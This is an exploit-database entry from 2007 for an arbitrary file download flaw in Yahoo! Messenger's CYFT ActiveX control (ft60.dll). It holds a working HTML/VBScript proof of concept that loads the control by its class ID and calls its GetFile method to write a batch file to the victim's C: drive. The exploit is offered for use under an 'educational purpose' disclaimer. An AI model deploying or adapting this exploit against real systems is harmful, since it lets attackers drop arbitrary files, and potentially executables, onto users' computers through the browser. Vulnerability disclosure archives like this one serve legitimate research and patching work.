Yahoo! Messenger CYFT Object Arbitrary File Download

Javier Perez 19.09.2007 Verified Vulnerable-App
Remote Exploits Windows

Exploit Code

<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>Yahoo! Messenger CYFT Object (ft60.dll) Arbitrary File Download</b>

 Author: shinnai
 mail: shinnai[at]autistici[dot]org

 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

 <b>Marked as:
 RegKey Safe for Script: False
 RegkeySafe for Init: False
 KillBitSet: False</b>

 From remote: depends by Internet Explorer settings
 From local: yes

 This contron contains a "GetFile()" method which allows to download, on
 user's pc, an arbitrary file pased as argument.
 Remote execution depends by Internet Explorer settings, local execution
 works very well.</b>

 <b>greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration</b>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.GetFile "","c:\\shinnai.bat",5,1,"shinnai"
   MsgBox "Exploit completed"
  End Sub

# [2007-09-19]